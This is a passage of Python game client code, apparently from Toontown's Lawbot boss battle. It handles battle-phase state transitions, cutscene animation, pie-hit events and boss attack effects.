DistributedBossCog.DistributedBossCog.enterOff(self) if self.witnessToon: self.witnessToon.clearChat() def enterWaitForToons(self): self.notify.debug('----- enterWaitForToons') DistributedBossCog.DistributedBossCog.enterWaitForToons(self) self.geom.hide() self.witnessToon.removeActive() def exitWaitForToons(self): self.notify.debug('----- exitWaitForToons') DistributedBossCog.DistributedBossCog.exitWaitForToons(self) self.geom.show() self.witnessToon.addActive() def enterElevator(self): self.notify.debug('----- enterElevator') DistributedBossCog.DistributedBossCog.enterElevator(self) self.witnessToon.removeActive() self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.happy = 1 self.raised = 1 self.forward = 1 self.doAnimate() self.__hideWitnessToon() if not self.mainDoor.isEmpty(): self.mainDoor.stash() if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.stash() camera.reparentTo(self.elevatorModel) camera.setPosHpr(0, 30, 8, 180, 0, 0) def exitElevator(self): self.notify.debug('----- exitElevator') DistributedBossCog.DistributedBossCog.exitElevator(self) self.witnessToon.removeActive() def enterIntroduction(self): self.notify.debug('----- enterIntroduction') self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.stopAnimate() self.__hideWitnessToon() DistributedBossCog.DistributedBossCog.enterIntroduction(self) base.playMusic(self.promotionMusic, looping=1, volume=0.9) if not self.mainDoor.isEmpty(): self.mainDoor.stash() if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.stash() def exitIntroduction(self): self.notify.debug('----- exitIntroduction') DistributedBossCog.DistributedBossCog.exitIntroduction(self) self.promotionMusic.stop() if not self.mainDoor.isEmpty(): pass if not self.reflectedMainDoor.isEmpty(): self.reflectedMainDoor.unstash() if not self.elevatorEntrance.isEmpty(): pass def enterBattleOne(self): self.notify.debug('----- LawbotBoss.enterBattleOne ') 
DistributedBossCog.DistributedBossCog.enterBattleOne(self) self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) self.clearChat() self.loop('Ff_neutral') self.notify.debug('self.battleANode = %s' % self.battleANode) self.__hideWitnessToon() if self.battleA == None or self.battleB == None: pass return def exitBattleOne(self): self.notify.debug('----- exitBattleOne') DistributedBossCog.DistributedBossCog.exitBattleOne(self) def stashBoss(self): self.stash() def unstashBoss(self, task): self.unstash() self.reparentTo(render) def enterRollToBattleTwo(self): self.notify.debug('----- enterRollToBattleTwo') self.releaseToons(finalBattle=1) self.stashBoss() self.toonsToBattlePosition(self.involvedToons, self.battleANode) self.stickBossToFloor() intervalName = 'RollToBattleTwo' seq = Sequence(self.__makeRollToBattleTwoMovie(), Func(self.__onToPrepareBattleTwo), name=intervalName) seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) taskMgr.doMethodLater(0.01, self.unstashBoss, 'unstashBoss') def __onToPrepareBattleTwo(self): self.notify.debug('----- __onToPrepareBattleTwo') self.unstickBoss() self.setPosHpr(*ToontownGlobals.LawbotBossBattleTwoPosHpr) self.doneBarrier('RollToBattleTwo') def exitRollToBattleTwo(self): self.notify.debug('----- exitRollToBattleTwo') self.unstickBoss() intervalName = 'RollToBattleTwo' self.clearInterval(intervalName) self.betweenBattleMusic.stop() def enterPrepareBattleTwo(self): self.notify.debug('----- enterPrepareBattleTwo') self.cleanupIntervals() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.clearChat() self.reparentTo(render) self.__showWitnessToon() prepareBattleTwoMovie = self.__makePrepareBattleTwoMovie() intervalName = 'prepareBattleTwo' seq = Sequence(prepareBattleTwoMovie, name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.acceptOnce('doneChatPage', self.__showCannonsAppearing) 
base.playMusic(self.stingMusic, looping=0, volume=1.0) def __showCannonsAppearing(self, elapsedTime = 0): allCannonsAppear = Sequence(Func(self.__positionToonsInFrontOfCannons), Func(camera.reparentTo, localAvatar), Func(camera.setPos, localAvatar.getOldCameraPosTwo()), Func(camera.lookAt, localAvatar)) multiCannons = Parallel() index = 0 self.involvedToons.sort() for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: if index in self.cannons: cannon = self.cannons[index] cannonSeq = cannon.generateCannonAppearTrack(toon) multiCannons.append(cannonSeq) index += 1 else: self.notify.warning('No cannon %d but we have a toon =%d' % (index, toonId)) allCannonsAppear.append(multiCannons) intervalName = 'prepareBattleTwoCannonsAppear' seq = Sequence(allCannonsAppear, Func(self.__onToBattleTwo), name=intervalName) seq.start() self.storeInterval(seq, intervalName) def __onToBattleTwo(self, elapsedTime = 0): self.notify.debug('----- __onToBattleTwo') self.doneBarrier('PrepareBattleTwo') taskMgr.doMethodLater(1, self.__showWaitingMessage, self.uniqueName('WaitingMessage')) def exitPrepareBattleTwo(self): self.notify.debug('----- exitPrepareBattleTwo') self.show() taskMgr.remove(self.uniqueName('WaitingMessage')) self.ignore('doneChatPage') self.__clearOnscreenMessage() self.stingMusic.stop() def enterBattleTwo(self): self.notify.debug('----- enterBattleTwo') self.cleanupIntervals() mult = ToontownBattleGlobals.getBossBattleCreditMultiplier(2) localAvatar.inventory.setBattleCreditMultiplier(mult) self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleTwoPosHpr) self.clearChat() self.witnessToon.clearChat() self.releaseToons(finalBattle=1) self.__showWitnessToon() if not self.useCannons: self.toonsToBattlePosition(self.toonsA, self.battleANode) self.toonsToBattlePosition(self.toonsB, self.battleBNode) base.playMusic(self.battleTwoMusic, looping=1, volume=0.9) self.startJuryBoxMoving() for index in xrange(len(self.cannons)): cannon = 
self.cannons[index] cannon.cannon.show() def getChairParent(self): return self.juryBox def startJuryBoxMoving(self): if self.juryBoxIval: self.juryBoxIval.finish() self.juryBoxIval = None self.juryBox.setPos(-30, 0, -12.645) self.reflectedJuryBox.setPos(-30, 0, 0) curPos = self.juryBox.getPos() endingAbsPos = Point3(curPos[0] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[0], curPos[1] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[1], curPos[2] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) curReflectedPos = self.reflectedJuryBox.getPos() reflectedEndingAbsPos = Point3(curReflectedPos[0] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[0], curReflectedPos[1] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[1], curReflectedPos[2] + ToontownGlobals.LawbotBossJuryBoxRelativeEndPos[2]) self.juryBoxIval = Parallel(self.juryBox.posInterval(ToontownGlobals.LawbotBossJuryBoxMoveTime, endingAbsPos), self.reflectedJuryBox.posInterval(ToontownGlobals.LawbotBossJuryBoxMoveTime, reflectedEndingAbsPos), SoundInterval(self.juryMovesSfx, node=self.chairs[2].nodePath, duration=ToontownGlobals.LawbotBossJuryBoxMoveTime, loop=1, volume=1.0)) self.juryBoxIval.start() self.juryTimer = ToontownTimer.ToontownTimer() self.juryTimer.posInTopRightCorner() self.juryTimer.countdown(ToontownGlobals.LawbotBossJuryBoxMoveTime) def exitBattleTwo(self): self.notify.debug('----- exitBattleTwo') intervalName = self.uniqueName('Drop') self.clearInterval(intervalName) self.cleanupBattles() self.battleTwoMusic.stop() localAvatar.inventory.setBattleCreditMultiplier(1) if self.juryTimer: self.juryTimer.destroy() del self.juryTimer self.juryTimer = None for chair in self.chairs.values(): chair.stopCogsFlying() return def enterRollToBattleThree(self): self.notify.debug('----- enterRollToBattleThree') self.reparentTo(render) self.stickBossToFloor() intervalName = 'RollToBattleThree' seq = Sequence(self.__makeRollToBattleThreeMovie(), Func(self.__onToPrepareBattleThree), name=intervalName) 
seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) def __onToPrepareBattleThree(self): self.notify.debug('----- __onToPrepareBattleThree') self.unstickBoss() self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.doneBarrier('RollToBattleThree') def exitRollToBattleThree(self): self.notify.debug('----- exitRollToBattleThree') self.unstickBoss() intervalName = 'RollToBattleThree' self.clearInterval(intervalName) self.betweenBattleMusic.stop() def enterPrepareBattleThree(self): self.notify.debug('----- enterPrepareBattleThree') self.cleanupIntervals() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.clearChat() self.reparentTo(render) base.playMusic(self.betweenBattleMusic, looping=1, volume=0.9) self.__showWitnessToon() prepareBattleThreeMovie = self.__makePrepareBattleThreeMovie() self.acceptOnce('doneChatPage', self.__onToBattleThree) intervalName = 'prepareBattleThree' seq = Sequence(prepareBattleThreeMovie, name=intervalName) seq.start() self.storeInterval(seq, intervalName) def __onToBattleThree(self, elapsed): self.notify.debug('----- __onToBattleThree') self.doneBarrier('PrepareBattleThree') taskMgr.doMethodLater(1, self.__showWaitingMessage, self.uniqueName('WaitingMessage')) def exitPrepareBattleThree(self): self.notify.debug('----- exitPrepareBattleThree') self.show() taskMgr.remove(self.uniqueName('WaitingMessage')) self.ignore('doneChatPage') intervalName = 'PrepareBattleThree' self.clearInterval(intervalName) self.__clearOnscreenMessage() self.betweenBattleMusic.stop() def enterBattleThree(self): DistributedBossCog.DistributedBossCog.enterBattleThree(self) self.scaleNodePath.unstash() localAvatar.setPos(-3, 0, 0) base.localAvatar.orbitalCamera.start() self.clearChat() self.witnessToon.clearChat() self.reparentTo(render) self.happy = 1 self.raised = 1 self.forward = 1 self.doAnimate() self.accept('enterWitnessStand', self.__touchedWitnessStand) 
self.accept('pieSplat', self.__pieSplat) self.accept('localPieSplat', self.__localPieSplat) self.accept('outOfPies', self.__outOfPies) self.accept('begin-pie', self.__foundPieButton) self.accept('enterDefenseCol', self.__enterDefenseCol) self.accept('enterProsecutionCol', self.__enterProsecutionCol) localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) taskMgr.doMethodLater(30, self.__howToGetPies, self.uniqueName('PieAdvice')) self.stickBossToFloor() self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.bossMaxDamage = ToontownGlobals.LawbotBossMaxDamage base.playMusic(self.battleThreeMusic, looping=1, volume=0.9) self.__showWitnessToon() diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty] self.bossHealthBar.initialize(self.bossMaxDamage - self.bossDamage, self.bossMaxDamage) if diffSettings[4]: localAvatar.chatMgr.chatInputSpeedChat.removeCJMenu() localAvatar.chatMgr.chatInputSpeedChat.addCJMenu(self.bonusWeight) def __doneBattleThree(self): self.notify.debug('----- __doneBattleThree') self.setState('NearVictory') self.unstickBoss() def exitBattleThree(self): self.notify.debug('----- exitBattleThree') DistributedBossCog.DistributedBossCog.exitBattleThree(self) NametagGlobals.setMasterArrowsOn(1) bossDoneEventName = self.uniqueName('DestroyedBoss') self.ignore(bossDoneEventName) taskMgr.remove(self.uniqueName('StandUp')) self.ignore('enterWitnessStand') self.ignore('pieSplat') self.ignore('localPieSplat') self.ignore('outOfPies') self.ignore('begin-pie') self.ignore('enterDefenseCol') self.ignore('enterProsecutionCol') self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) if self.bossDamageMovie: self.bossDamageMovie.finish() self.bossDamageMovie = None self.unstickBoss() taskName = 'RecoverBossDamage' taskMgr.remove(taskName) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() return def 
enterNearVictory(self): self.cleanupIntervals() self.reparentTo(render) self.setPos(*ToontownGlobals.LawbotBossDeathPos) self.setHpr(*ToontownGlobals.LawbotBossBattleThreeHpr) self.clearChat() self.releaseToons(finalBattle=1) self.accept('pieSplat', self.__finalPieSplat) self.accept('localPieSplat', self.__localPieSplat) self.accept('outOfPies', self.__outOfPies) localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.happy = 0 self.raised = 0 self.forward = 1 self.doAnimate() self.setDizzy(1) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def exitNearVictory(self): self.notify.debug('----- exitNearVictory') self.ignore('pieSplat') self.ignore('localPieSplat') self.ignore('outOfPies') self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) self.setDizzy(0) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterVictory(self): self.notify.debug('----- enterVictory') self.cleanupIntervals() self.reparentTo(render) self.setPosHpr(*ToontownGlobals.LawbotBossBattleThreePosHpr) self.loop('neutral') localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.clearChat() self.witnessToon.clearChat() self.controlToons() self.setToonsToNeutral(self.involvedToons) self.happy = 1 self.raised = 1 self.forward = 1 intervalName = 'VictoryMovie' seq = Sequence(self.makeVictoryMovie(), Func(self.__continueVictory), name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.bossHealthBar.deinitialize() base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __continueVictory(self): self.notify.debug('----- __continueVictory') self.stopAnimate() self.doneBarrier('Victory') def exitVictory(self): self.notify.debug('----- exitVictory') self.stopAnimate() self.unstash() localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) self.battleThreeMusicTime = 
self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterDefeat(self): self.notify.debug('----- enterDefeat') self.cleanupIntervals() localAvatar.setCameraFov(ToontownGlobals.BossBattleCameraFov) self.reparentTo(render) self.clearChat() self.releaseToons(finalBattle=1) self.happy = 0 self.raised = 0 self.forward = 1 intervalName = 'DefeatMovie' seq = Sequence(self.makeDefeatMovie(), Func(self.__continueDefeat), name=intervalName) seq.start() self.storeInterval(seq, intervalName) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __continueDefeat(self): self.notify.debug('----- __continueDefeat') self.stopAnimate() self.doneBarrier('Defeat') def exitDefeat(self): self.notify.debug('----- exitDefeat') self.stopAnimate() self.unstash() localAvatar.setCameraFov(ToontownGlobals.CogHQCameraFov) self.battleThreeMusicTime = self.battleThreeMusic.getTime() self.battleThreeMusic.stop() def enterReward(self): self.cleanupIntervals() self.clearChat() self.witnessToon.clearChat() self.stash() self.stopAnimate() self.controlToons() panelName = self.uniqueName('reward') self.rewardPanel = RewardPanel.RewardPanel(panelName) victory, camVictory, skipper = MovieToonVictory.doToonVictory(1, self.involvedToons, self.toonRewardIds, self.toonRewardDicts, self.deathList, self.rewardPanel, allowGroupShot=0, uberList=self.uberList, noSkip=True) ival = Sequence(Parallel(victory, camVictory), Func(self.__doneReward)) intervalName = 'RewardMovie' delayDeletes = [] for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.enterReward')) ival.delayDeletes = delayDeletes ival.start() self.storeInterval(ival, intervalName) base.playMusic(self.battleThreeMusic, looping=1, volume=0.9, time=self.battleThreeMusicTime) def __doneReward(self): self.notify.debug('----- __doneReward') self.doneBarrier('Reward') self.toWalkMode() def exitReward(self): 
self.notify.debug('----- exitReward') intervalName = 'RewardMovie' self.clearInterval(intervalName) self.unstash() self.rewardPanel.destroy() del self.rewardPanel self.battleThreeMusicTime = 0 self.battleThreeMusic.stop() def enterEpilogue(self): self.cleanupIntervals() self.clearChat() self.witnessToon.clearChat() self.stash() self.stopAnimate() self.controlToons() self.__showWitnessToon() self.witnessToon.reparentTo(render) self.witnessToon.setPosHpr(*ToontownGlobals.LawbotBossWitnessEpiloguePosHpr) self.witnessToon.loop('Sit') self.__arrangeToonsAroundWitnessToon() camera.reparentTo(render) camera.setPos(self.witnessToon, -9, 12, 6) camera.lookAt(self.witnessToon, 0, 0, 3) intervalName = 'EpilogueMovie' seq = Sequence(self.makeEpilogueMovie(), name=intervalName) seq.start() self.storeInterval(seq, intervalName) self.accept('doneChatPage', self.__doneEpilogue) base.playMusic(self.epilogueMusic, looping=1, volume=0.9) def __doneEpilogue(self, elapsedTime = 0): self.notify.debug('----- __doneEpilogue') intervalName = 'EpilogueMovieToonAnim' self.clearInterval(intervalName) track = Parallel(Sequence(Wait(0.5), Func(self.localToonToSafeZone))) self.storeInterval(track, intervalName) track.start() def exitEpilogue(self): self.notify.debug('----- exitEpilogue') self.clearInterval('EpilogueMovieToonAnim') self.unstash() self.epilogueMusic.stop() def enterFrolic(self): self.notify.debug('----- enterFrolic') self.setPosHpr(*ToontownGlobals.LawbotBossBattleOnePosHpr) DistributedBossCog.DistributedBossCog.enterFrolic(self) self.show() def doorACallback(self, isOpen): if self.insidesANodePath: if isOpen: self.insidesANodePath.unstash() else: self.insidesANodePath.stash() def doorBCallback(self, isOpen): if self.insidesBNodePath: if isOpen: self.insidesBNodePath.unstash() else: self.insidesBNodePath.stash() def __toonsToPromotionPosition(self, toonIds, battleNode): self.notify.debug('----- __toonsToPromotionPosition') points = BattleBase.BattleBase.toonPoints[len(toonIds) - 
1] for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: toon.reparentTo(render) pos, h = points[i] toon.setPosHpr(battleNode, pos[0], pos[1] + 10, pos[2], h, 0, 0) def __outOfPies(self): self.notify.debug('----- outOfPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossNeedMoreEvidence) taskMgr.doMethodLater(20, self.__howToGetPies, self.uniqueName('PieAdvice')) def __howToGetPies(self, task): self.notify.debug('----- __howToGetPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossHowToGetEvidence) def __howToThrowPies(self, task): self.notify.debug('----- __howToThrowPies') self.__showOnscreenMessage(TTLocalizer.LawbotBossHowToThrowPies) def __foundPieButton(self): self.everThrownPie = 1 self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) def __touchedWitnessStand(self, entry): self.sendUpdate('touchWitnessStand', []) self.__clearOnscreenMessage() taskMgr.remove(self.uniqueName('PieAdvice')) base.playSfx(self.piesRestockSfx) if not self.everThrownPie: taskMgr.doMethodLater(30, self.__howToThrowPies, self.uniqueName('PieAdvice')) def __pieSplat(self, toon, pieCode): if pieCode == ToontownGlobals.PieCodeBossInsides: if toon == localAvatar: self.d_hitBossInsides() self.flashRed() elif pieCode == ToontownGlobals.PieCodeBossCog: if toon == localAvatar: self.d_hitBoss(1) if self.dizzy: self.flashRed() self.doAnimate('hit', now=1) elif pieCode == ToontownGlobals.PieCodeDefensePan: self.flashRed() self.flashPanBlue() base.playSfx(self.evidenceHitSfx, node=self.defensePanNodePath, volume=0.25) if toon == localAvatar: self.d_hitBoss(self.panDamage) elif pieCode == ToontownGlobals.PieCodeProsecutionPan: self.flashGreen() if toon == localAvatar: pass elif pieCode == ToontownGlobals.PieCodeLawyer: pass def __localPieSplat(self, pieCode, entry): if pieCode == ToontownGlobals.PieCodeLawyer: self.__lawyerGotHit(entry) if pieCode != ToontownGlobals.PieCodeToon: return avatarDoId = entry.getIntoNodePath().getNetTag('avatarDoId') 
if avatarDoId == '': self.notify.warning('Toon %s has no avatarDoId tag.' % repr(entry.getIntoNodePath())) return doId = int(avatarDoId) if doId != localAvatar.doId: self.d_hitToon(doId) def __lawyerGotHit(self, entry): lawyerCol = entry.getIntoNodePath() names = lawyerCol.getName().split('-') lawyerDoId = int(names[1]) for lawyer in self.lawyers: if lawyerDoId == lawyer.doId: lawyer.sendUpdate('hitByToon', []) def __finalPieSplat(self, toon, pieCode): if pieCode != ToontownGlobals.PieCodeDefensePan: return self.sendUpdate('finalPieSplat', []) self.ignore('pieSplat') def cleanupAttacks(self): self.notify.debug('----- cleanupAttacks') self.__cleanupStrafe() def __cleanupStrafe(self): self.notify.debug('----- __cleanupStrage') if self.strafeInterval: self.strafeInterval.finish() self.strafeInterval = None return def __cleanupJuryBox(self): self.notify.debug('----- __cleanupJuryBox') if self.juryBoxIval: self.juryBoxIval.finish() self.juryBoxIval = None if self.juryBox: self.juryBox.removeNode() return def doStrafe(self, side, direction): gearRoot = self.rotateNode.attachNewNode('gearRoot') if side == 0: gearRoot.setPos(0, -7, 3) gearRoot.setHpr(180, 0, 0) door = self.doorA else: gearRoot.setPos(0, 7, 3) door = self.doorB gearRoot.setTag('attackCode', str(ToontownGlobals.BossCogStrafeAttack)) gearModel = self.getGearFrisbee() gearModel.setScale(0.1) t = self.getBossDamage() / 100.0 gearTrack = Parallel() numGears = int(4 + 6 * t + 0.5) time = 5.0 - 4.0 * t spread = 60 * math.pi / 180.0 if direction == 1: spread = -spread dist = 50 rate = time / numGears for i in xrange(numGears): node = gearRoot.attachNewNode(str(i)) node.hide() node.setPos(0, 0, 0) gear = gearModel.instanceTo(node) angle = (float(i) / (numGears - 1) - 0.5) * spread x = dist * math.sin(angle) y = dist * math.cos(angle) h = random.uniform(-720, 720) gearTrack.append(Sequence(Wait(i * rate), Func(node.show), Parallel(node.posInterval(1, Point3(x, y, 0), fluid=1), node.hprInterval(1, VBase3(h, 0, 0), 
fluid=1), Sequence(SoundInterval(self.strafeSfx[i], volume=0.2, node=self), duration=0)), Func(node.detachNode))) seq = Sequence(Func(door.request, 'open'), Wait(0.7), gearTrack, Func(door.request, 'close')) self.__cleanupStrafe() self.strafeInterval = seq seq.start() def replaceCollisionPolysWithPlanes(self, model): newCollisionNode = CollisionNode('collisions') newCollideMask = BitMask32(0) planes = [] collList = model.findAllMatches('**/+CollisionNode') if not collList: collList = [model] for cnp in collList: cn = cnp.node() if not isinstance(cn, CollisionNode): self.notify.warning('Not a collision node: %s' % repr(cnp)) break newCollideMask = newCollideMask | cn.getIntoCollideMask() for i in xrange(cn.getNumSolids()): solid = cn.getSolid(i) if isinstance(solid, CollisionPolygon): plane = Plane(solid.getPlane()) planes.append(plane) else: self.notify.warning('Unexpected collision solid: %s' % repr(solid)) newCollisionNode.addSolid(plane) newCollisionNode.setIntoCollideMask(newCollideMask) threshold = 0.1 planes.sort(lambda p1, p2: p1.compareTo(p2, threshold)) lastPlane = None for plane in planes: if lastPlane == None or plane.compareTo(lastPlane, threshold) != 0: cp = CollisionPlane(plane) newCollisionNode.addSolid(cp) lastPlane = plane return NodePath(newCollisionNode) def makeIntroductionMovie(self, delayDeletes): self.notify.debug('----- makeIntroductionMovie') for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: delayDeletes.append(DelayDelete.DelayDelete(toon, 'LawbotBoss.makeIntroductionMovie')) track = Parallel() bossAnimTrack = Sequence( ActorInterval(self, 'Ff_speech', startTime=2, duration=10, loop=1), ActorInterval(self, 'Ff_lookRt', duration=3), ActorInterval(self, 'Ff_lookRt', duration=3, startTime=3, endTime=0), ActorInterval(self, 'Ff_neutral', duration=2), ActorInterval(self, 'Ff_speech', duration=7, loop=1)) track.append(bossAnimTrack) attackToons = TTLocalizer.BossCogAttackToons dialogTrack = Track( (0, 
Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro0, CFSpeech)), (5.6, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro1, CFSpeech)), (12, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro2, CFSpeech)), (18, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro3, CFSpeech)), (22, Func(self.setChatAbsolute, TTLocalizer.LawbotBossTempIntro4, CFSpeech)), (24, Sequence( Func(self.clearChat), self.loseCogSuits(self.toonsA + self.toonsB, render, (-2.798, -70, 10, 180, 0, 0)))), (27, Sequence( self.toonNormalEyes(self.involvedToons), Func(self.loop, 'Ff_neutral'), Func(self.setChatAbsolute, attackToons, CFSpeech)))) track.append(dialogTrack) return Sequence( Func(self.stickToonsToFloor), track, Func(self.unstickToons), name=self.uniqueName('Introduction')) def walkToonsToBattlePosition(self, toonIds, battleNode): self.notify.debug('walkToonsToBattlePosition-----------------------------------------------') self.notify.debug('toonIds=%s battleNode=%s' % (toonIds, battleNode)) ival = Parallel() points = BattleBase.BattleBase.toonPoints[len(toonIds) - 1] self.notify.debug('walkToonsToBattlePosition: points = %s' % points[0][0]) for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: pos, h = points[i] origPos = pos self.notify.debug('origPos = %s' % origPos) self.notify.debug('batlleNode.getTransform = %s render.getTransform=%s' % (battleNode.getTransform(), render.getTransform())) self.notify.debug('render.getScale()=%s battleNode.getScale()=%s' % (render.getScale(), battleNode.getScale())) myCurPos = self.getPos() self.notify.debug('myCurPos = %s' % self.getPos()) self.notify.debug('battleNode.parent() = %s' % battleNode.getParent()) self.notify.debug('battleNode.parent().getPos() = %s' % battleNode.getParent().getPos()) bnParent = battleNode.getParent() battleNode.wrtReparentTo(render) bnWorldPos = battleNode.getPos() battleNode.wrtReparentTo(bnParent) self.notify.debug('battle node world pos = %s' % bnWorldPos) pos = 
render.getRelativePoint(battleNode, pos) self.notify.debug('walktToonsToBattlePosition: render.getRelativePoint result = %s' % pos) self.notify.debug('walkToonsToBattlePosition: final pos = %s' % pos) ival.append(Sequence(Func(toon.setPlayRate, 0.8, 'walk'), Func(toon.loop, 'walk'), toon.posInterval(3, pos), Func(toon.setPlayRate, 1, 'walk'), Func(toon.loop, 'neutral'))) return ival def toonsToBattlePosition(self, toonIds, battleNode): self.notify.debug('DistrutedLawbotBoss.toonsToBattlePosition----------------------------------------') self.notify.debug('toonIds=%s battleNode=%s' % (toonIds, battleNode)) if len(toonIds) < 5: points = BattleBase.BattleBase.toonPoints[len(toonIds) - 1] else: points = list(BattleBase.BattleBase.toonPoints[3]) points.extend(BattleBase.BattleBase.toonPoints[len(toonIds) - 5]) self.notify.debug('toonsToBattlePosition: points = %s' % points[0][0]) for i in xrange(len(toonIds)): toon = base.cr.doId2do.get(toonIds[i]) if toon: toon.wrtReparentTo(render) pos, h = points[i] if i > 3: pos.setY(pos.getY() + 2.0) bnParent = battleNode.getParent() battleNode.wrtReparentTo(render) bnWorldPos = battleNode.getPos() battleNode.wrtReparentTo(bnParent) toon.setPosHpr(battleNode, pos[0], pos[1], pos[2], h, 0, 0) self.notify.debug('new toon pos %s ' % toon.getPos()) def touchedGavel(self, gavel, entry): self.notify.debug('touchedGavel') attackCodeStr = entry.getIntoNodePath().getNetTag('attackCode') if attackCodeStr == '': self.notify.warning('Node %s has no attackCode tag.' % repr(entry.getIntoNodePath())) return attackCode = int(attackCodeStr) into = entry.getIntoNodePath() self.zapLocalToon(attackCode, into) def touchedGavelHandle(self, gavel, entry): attackCodeStr = entry.getIntoNodePath().getNetTag('attackCode') if attackCodeStr == '': self.notify.warning('Node %s has no attackCode tag.' 
% repr(entry.getIntoNodePath())) return attackCode = int(attackCodeStr) into = entry.getIntoNodePath() self.zapLocalToon(attackCode, into) def createBlock(self, x1, y1, z1, x2, y2, z2, r = 1.0, g = 1.0, b = 1.0, a = 1.0): gFormat = GeomVertexFormat.getV3n3cpt2() myVertexData = GeomVertexData('holds my vertices', gFormat, Geom.UHDynamic) vertexWriter = GeomVertexWriter(myVertexData, 'vertex') normalWriter = GeomVertexWriter(myVertexData, 'normal') colorWriter = GeomVertexWriter(myVertexData, 'color') texWriter = GeomVertexWriter(myVertexData, 'texcoord') vertexWriter.addData3f(x1, y1, z1) vertexWriter.addData3f(x2, y1, z1) vertexWriter.addData3f(x1, y2, z1) vertexWriter.addData3f(x2, y2, z1) vertexWriter.addData3f(x1, y1, z2) vertexWriter.addData3f(x2, y1, z2) vertexWriter.addData3f(x1, y2, z2) vertexWriter.addData3f(x2, y2, z2) for index in xrange(8): normalWriter.addData3f(1.0, 1.0, 1.0) colorWriter.addData4f(r, g, b, a) texWriter.addData2f(1.0, 1.0) tris = GeomTriangles(Geom.UHDynamic) tris.addVertex(0) tris.addVertex(1) tris.addVertex(2) tris.closePrimitive() tris.addVertex(1) tris.addVertex(3) tris.addVertex(2) tris.closePrimitive() tris.addVertex(2) tris.addVertex(3) tris.addVertex(6) tris.closePrimitive() tris.addVertex(3) tris.addVertex(7) tris.addVertex(6) tris.closePrimitive() tris.addVertex(0) tris.addVertex(2) tris.addVertex(4) tris.closePrimitive() tris.addVertex(2) tris.addVertex(6) tris.addVertex(4) tris.closePrimitive() tris.addVertex(1) tris.addVertex(5) tris.addVertex(3) tris.closePrimitive() tris.addVertex(3) tris.addVertex(5) tris.addVertex(7) tris.closePrimitive() tris.addVertex(0) tris.addVertex(4) tris.addVertex(5) tris.closePrimitive() tris.addVertex(1) tris.addVertex(0) tris.addVertex(5) tris.closePrimitive() tris.addVertex(4) tris.addVertex(6) tris.addVertex(7) tris.closePrimitive() tris.addVertex(7) tris.addVertex(5) tris.addVertex(4) tris.closePrimitive() cubeGeom = Geom(myVertexData) cubeGeom.addPrimitive(tris) cubeGN = GeomNode('cube') 
cubeGN.addGeom(cubeGeom) return cubeGN def __enterDefenseCol(self, entry): self.notify.debug('__enterDefenseCol') def __enterProsecutionCol(self, entry): self.notify.debug('__enterProsecutionCol') def makeVictoryMovie(self): myFromPos = Point3(ToontownGlobals.LawbotBossBattleThreePosHpr[0], ToontownGlobals.LawbotBossBattleThreePosHpr[1], ToontownGlobals.LawbotBossBattleThreePosHpr[2]) myToPos = Point3(myFromPos[0], myFromPos[1] + 30, myFromPos[2]) rollThroughDoor = self.rollBossToPoint(fromPos=myFromPos, fromHpr=None, toPos=myToPos, toHpr=None, reverse=0) rollTrack = Sequence( Func(self.getGeomNode().setH, 180), rollThroughDoor[0], Func(self.getGeomNode().setH, 0)) rollTrackDuration = rollTrack.getDuration() self.notify.debug('rollTrackDuration = %f' % rollTrackDuration) doorStartPos = self.door3.getPos() doorEndPos = Point3(doorStartPos[0], doorStartPos[1], doorStartPos[2] + 25) bossTrack = Track( (0.5, Sequence( Func(self.clearChat), Func(camera.reparentTo, render), 